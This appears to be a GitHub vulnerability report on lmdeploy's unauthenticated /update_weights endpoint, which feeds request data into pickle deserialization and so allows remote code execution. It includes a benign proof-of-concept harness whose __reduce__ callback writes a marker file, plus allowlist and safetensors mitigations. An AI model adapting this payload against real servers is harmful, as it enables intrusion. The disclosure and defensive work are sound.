Checklist
Describe the bug
POST /update_weights accepts the JSON field serialized_named_tensors as a str | list[str] | dict and forwards the request object directly to the backend weight-update implementation.
When the value is a string, both backend paths deserialize request-controlled bytes with multiprocessing.reduction.ForkingPickler.loads(...):
- TurboMind backend: lmdeploy/turbomind/turbomind.py, TurboMind.update_params
- PyTorch backend: lmdeploy/pytorch/engine/model_agent/agent.py, ModelAgent.update_params
In CPython, ForkingPickler.loads resolves to native _pickle.loads. This means a remote HTTP request body can reach native pickle deserialization before any tensor/weight structure validation. Pickle reconstruction callbacks can run during loading, so this is an unsafe deserialization issue in the API server process.
The endpoint has no authentication by default and the server binds to all interfaces (0.0.0.0) by default, so any remote attacker who can reach the server can run arbitrary system commands through a crafted __reduce__ callback during deserialization. The result is unauthenticated remote code execution (RCE) in the API server process.
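The mechanism can be seen in isolation with a benign payload. The following is a minimal sketch, not taken from lmdeploy: the `Marker` class and the use of `print` as the callback are illustrative choices, and the only point is that the callable returned by `__reduce__` is invoked inside `ForkingPickler.loads` before the caller receives any object to validate.

```python
import contextlib
import io
import pickle
from multiprocessing.reduction import ForkingPickler


class Marker:
    """Benign stand-in for an attacker-controlled object."""

    def __reduce__(self):
        # pickle stores (callable, args); the unpickler calls callable(*args)
        # to "rebuild" the object. Here the callable is the builtin print.
        return (print, ("callback ran inside loads",))


blob = pickle.dumps(Marker())

# Capture stdout so the side effect of loading is visible as a value.
captured = io.StringIO()
with contextlib.redirect_stdout(captured):
    result = ForkingPickler.loads(blob)

# The side effect has already happened, and the caller gets back whatever the
# callback returned (None for print), not a Marker instance.
side_effect = captured.getvalue()
```

Any importable callable could stand in for `print`, which is why validating the returned object afterwards is too late.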
The API server defaults make the path easier to expose accidentally:
- lmdeploy serve api_server defaults to --server-name 0.0.0.0
- api_keys defaults to None
- authentication middleware is only installed when non-empty API keys are configured
Reproduction
From a checkout of lmdeploy, I used this local harness. It stubs heavyweight CUDA/model dependencies, imports the target lmdeploy/turbomind/turbomind.py file, and calls the real TurboMind.update_params method. The marker appears before the later expected TypeError, showing that deserialization happened before weight-shape/structure handling.
python repro_update_weights_deser.py
repro_update_weights_deser.py:
import base64
import importlib.util
import pickle
import sys
import types
from pathlib import Path
repo = Path.cwd()
out = Path("update_weights_deser_marker.txt").resolve()

class Marker:
    def __reduce__(self):
        return (out.write_text, ("target update_params deserialized payload\n",))


class _Cuda:
    @staticmethod
    def device(_dev):
        class Ctx:
            def __enter__(self):
                return None

            def __exit__(self, exc_type, exc, tb):
                return False

        return Ctx()

    @staticmethod
    def current_device():
        return 0


def install_stubs():
    torch = types.ModuleType("torch")
    torch.Tensor = object
    torch.cuda = _Cuda
    torch.IntTensor = lambda value: value
    torch.from_dlpack = lambda value: value
    sys.modules["torch"] = torch

    pybase64 = types.ModuleType("pybase64")
    pybase64.b64decode = base64.b64decode
    sys.modules["pybase64"] = pybase64

    lmdeploy = types.ModuleType("lmdeploy")
    lmdeploy.__file__ = str(repo / "lmdeploy" / "__init__.py")
    lmdeploy.__path__ = [str(repo / "lmdeploy")]
    sys.modules["lmdeploy"] = lmdeploy

    messages = types.ModuleType("lmdeploy.messages")
    for name in [
        "EngineOutput",
        "GenerationConfig",
        "ResponseType",
        "ScheduleMetrics",
        "TurbomindEngineConfig",
    ]:
        setattr(messages, name, type(name, (), {}))
    sys.modules["lmdeploy.messages"] = messages

    protocol = types.ModuleType("lmdeploy.serve.openai.protocol")
    protocol.UpdateParamsRequest = type("UpdateParamsRequest", (), {})
    sys.modules["lmdeploy.serve"] = types.ModuleType("lmdeploy.serve")
    sys.modules["lmdeploy.serve.openai"] = types.ModuleType("lmdeploy.serve.openai")
    sys.modules["lmdeploy.serve.openai.protocol"] = protocol

    tokenizer = types.ModuleType("lmdeploy.tokenizer")
    tokenizer.Tokenizer = type("Tokenizer", (), {})
    sys.modules["lmdeploy.tokenizer"] = tokenizer

    utils = types.ModuleType("lmdeploy.utils")
    utils.get_logger = lambda _name=None: types.SimpleNamespace(
        info=lambda *a, **k: None,
        warning=lambda *a, **k: None,
        error=lambda *a, **k: None,
        debug=lambda *a, **k: None,
    )
    utils.get_max_batch_size = lambda _device: 1
    utils.get_model = lambda model, *a, **k: model
    sys.modules["lmdeploy.utils"] = utils

    tm_pkg = types.ModuleType("lmdeploy.turbomind")
    tm_pkg.__path__ = [str(repo / "lmdeploy" / "turbomind")]
    sys.modules["lmdeploy.turbomind"] = tm_pkg

    supported = types.ModuleType("lmdeploy.turbomind.supported_models")
    supported.is_supported = lambda *a, **k: True
    sys.modules["lmdeploy.turbomind.supported_models"] = supported

    tm_native = types.ModuleType("_turbomind")
    tm_native.TensorMap = dict
    tm_native.DataType = types.SimpleNamespace(TYPE_UINT32=1, TYPE_INT32=2)
    sys.modules["_turbomind"] = tm_native
    sys.modules["_xgrammar"] = types.ModuleType("_xgrammar")

    tokenizer_info = types.ModuleType("lmdeploy.turbomind.tokenizer_info")
    tokenizer_info.TokenizerInfo = type("TokenizerInfo", (), {})
    sys.modules["lmdeploy.turbomind.tokenizer_info"] = tokenizer_info


def load_target_module():
    path = repo / "lmdeploy" / "turbomind" / "turbomind.py"
    spec = importlib.util.spec_from_file_location("lmdeploy.turbomind.turbomind", path)
    mod = importlib.util.module_from_spec(spec)
    sys.modules[spec.name] = mod
    spec.loader.exec_module(mod)
    return mod


if out.exists():
    out.unlink()

install_stubs()
target = load_target_module()

payload = base64.b64encode(pickle.dumps(Marker())).decode()
request = types.SimpleNamespace(serialized_named_tensors=payload, finished=False)
self_obj = types.SimpleNamespace(devices=[0])

print("loads_module", getattr(pickle.loads, "__module__", None))
print("marker_before", out.exists())
try:
    target.TurboMind.update_params(self_obj, request)
except Exception as exc:
    print("target_exception_after_loads", type(exc).__name__, str(exc))
print("marker_after", out.exists())
if out.exists():
    print("marker_text", out.read_text().strip())
Observed output:
loads_module _pickle
marker_before False
target_exception_after_loads TypeError 'int' object is not iterable
marker_after True
marker_text target update_params deserialized payload
The TypeError is expected because this harness intentionally uses a harmless marker object instead of a real weight iterator. The important observation is that the marker file is written before the later weight-handling error.
A real HTTP path to the same sink is:
POST /update_weights
-> UpdateParamsRequest.serialized_named_tensors
-> api_server.update_params(...)
-> VariableInterface.async_engine.engine.update_params(request)
-> pybase64.b64decode(request.serialized_named_tensors)
-> ForkingPickler.loads(...)
-> native _pickle.loads(...)
Environment
The issue is source-level and the local harness does not require a model or GPU.
Manual environment used for the local verification:
Repo commit: d9b2613182f1f94225b33239fd8dcc8903a984ce
OS: Ubuntu 24.04.3 LTS under WSL2
Python: 3.13.9
GCC/G++: 13.3.0
Error traceback
The local harness output is:
loads_module _pickle
marker_before False
target_exception_after_loads TypeError 'int' object is not iterable
marker_after True
marker_text target update_params deserialized payload
The exception happens after `_pickle.loads` returns and after the marker side effect has occurred.
The root cause appears to be accepting pickle-serialized weight data over HTTP and loading it before any schema, type, signature, or allowlist validation.
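To illustrate what allowlist validation could look like if pickle had to stay in place temporarily, here is a minimal sketch based on the `find_class` override pattern from the Python `pickle` documentation. The names `ALLOWED_GLOBALS`, `AllowlistUnpickler`, and `restricted_loads` are hypothetical, and the single allowlisted entry is a placeholder rather than the set of globals a real weight payload needs. This narrows the attack surface but should not be read as making pickle safe for untrusted input.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist of (module, name) pairs the server agrees to resolve.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every global referenced by the pickle stream is resolved here,
        # so refusing unknown names stops arbitrary callables from loading.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    """Drop-in stand-in for pickle.loads that enforces the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Marker:
    """Benign payload whose rebuild callable is not on the allowlist."""

    def __reduce__(self):
        return (print, ("callback ran",))


# An allowlisted container of plain values loads normally.
ok = restricted_loads(pickle.dumps(OrderedDict(a=1)))

# The Marker payload is refused before print is ever looked up.
try:
    restricted_loads(pickle.dumps(Marker()))
    rejected = False
except pickle.UnpicklingError:
    rejected = True
```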
Avoid pickle for HTTP weight updates. Prefer a safe tensor serialization format such as `safetensors` plus explicit metadata validation.
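As a sketch of what explicit metadata validation might involve, the example below parses only the header of a safetensors-style blob with the standard library and checks it against an expected set of tensors. It assumes the layout described in the safetensors format documentation (an 8-byte little-endian header length, a JSON header with `dtype`, `shape`, and `data_offsets` per tensor, then raw bytes). `EXPECTED`, `validate_header`, `build_blob`, and the size cap are hypothetical names and values chosen for illustration, not part of lmdeploy or the safetensors library.

```python
import json
import struct

# Hypothetical allowlist: tensor name -> (dtype tag, shape) the server expects.
EXPECTED = {"linear.weight": ("F32", [2, 2])}
DTYPE_BYTES = {"F32": 4, "F16": 2, "BF16": 2}
MAX_HEADER_BYTES = 1 << 20  # arbitrary cap for this sketch


def validate_header(blob: bytes, expected: dict) -> dict:
    """Check names, dtypes, shapes, and offsets without executing any code."""
    if len(blob) < 8:
        raise ValueError("payload shorter than the 8-byte length prefix")
    (header_len,) = struct.unpack("<Q", blob[:8])
    if header_len > MAX_HEADER_BYTES or 8 + header_len > len(blob):
        raise ValueError("implausible header length")
    header = json.loads(blob[8:8 + header_len])
    if not isinstance(header, dict):
        raise ValueError("header is not a JSON object")
    header.pop("__metadata__", None)  # optional string-to-string map
    if set(header) != set(expected):
        raise ValueError("tensor names do not match the allowlist")
    data_len = len(blob) - 8 - header_len
    for name, (dtype, shape) in expected.items():
        info = header[name]
        if not isinstance(info, dict):
            raise ValueError(f"{name}: entry is not an object")
        if info.get("dtype") != dtype or info.get("shape") != shape:
            raise ValueError(f"{name}: dtype or shape mismatch")
        offsets = info.get("data_offsets")
        if not (isinstance(offsets, list) and len(offsets) == 2
                and all(isinstance(v, int) for v in offsets)):
            raise ValueError(f"{name}: malformed data_offsets")
        begin, end = offsets
        size = DTYPE_BYTES[dtype]
        for dim in shape:
            size *= dim
        if not (0 <= begin <= end <= data_len) or end - begin != size:
            raise ValueError(f"{name}: data_offsets out of range")
    return header


def build_blob(header: dict, data: bytes) -> bytes:
    """Example-only helper: length prefix + JSON header + raw tensor bytes."""
    raw = json.dumps(header).encode("utf-8")
    return struct.pack("<Q", len(raw)) + raw + data


good = build_blob(
    {"linear.weight": {"dtype": "F32", "shape": [2, 2], "data_offsets": [0, 16]}},
    bytes(16),
)
checked = validate_header(good, EXPECTED)
```

Because the header is plain JSON, a malformed or unexpected payload fails as a `ValueError` before any tensor bytes are interpreted, in contrast to pickle, where loading itself runs callbacks.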